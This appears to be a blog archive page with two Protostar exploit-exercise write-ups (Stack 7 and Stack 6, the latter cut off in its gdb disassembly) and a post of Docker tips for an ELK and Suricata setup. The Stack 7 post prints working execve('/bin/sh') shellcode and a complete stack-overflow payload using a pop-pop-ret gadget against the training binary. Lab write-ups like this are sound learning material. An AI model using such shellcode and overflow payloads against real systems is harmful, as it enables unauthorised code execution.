Posts

Showing posts from November, 2016

Exploit Exercises - Protostar Stack 7

In this level, the app checks that the return address does not start with 0xbxxxxxxx, so I cannot return straight into the stack. Instead I return to a pop pop ret gadget: it pops two junk words and then returns to the address that follows them on the stack, which is where the shell code lives. Found pop pop ret at: 0x08048492
This is the payload layout:
| "A" * 80 | gadget address | 8 bytes junk | NOP sled (absorbs small address shifts) | shell code |
This is the shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load the PoC into gdb, debug it, set a break point, etc. I found the NOP sled starting at: 0xbffff698. OK, build the PoC:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"

Exploit Exercises - Protostar Stack 6

It is free time, so I had some time to play exploit-exercises. Today I am playing stack level 6. I learned something new here: return to libc. Use gdb and disassemble:
#gdb -q /opt/protostar/bin/stack6
(gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :    mov    %ebp,%esp
0x08048507 :    pop    %ebp
0x08048508 :    ret
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 :    push   %ebp
0x08048485 :    mov    %esp,%ebp
0x08048487 :    sub    $0x68,%esp
0x0804848a :    mov    $0x80485d0,%eax
0x0804848f :    mov    %eax,(%esp)
0x08048492 :    call   0x80483c0
0x08048497 :    mov    0x8049720,%eax
0x0804849c :    mov    %eax,(%esp)
0x0804849f :    call   0x80483b0
0x080484a4 :    lea    -0x4c(%ebp),%eax
0x080484a7 :    mov    %eax,(%esp)
0x080484aa :    call

Some experience when use Docker

This week my job was to set up ELK with Suricata, and I chose Docker as the platform to run everything on. Now I have some experience with Docker to share:
- Use docker-compose. It is a very good way to deploy for production: build && run.
- Install docker-compose via pip.
- Use a built image to create your own customised start-up distro.
- I used docker-compose version 2 syntax; notice the differences between versions, for example network vs net.
- Use the --net network option if you need to monitor traffic, or to see all network cards.
- You cannot use the cd command in a Dockerfile; use WORKDIR instead. Read the Dockerfile documentation very carefully.
- Use links. When you use them, the linked containers are started before the main one. You can also start them manually and start the main container afterwards, but make sure they are already running.
- The container's command must be a foreground process that keeps the container alive, for example: suricata -c xxx or python manage.py runserver 0.0.0.0:8080
Thanks for reading.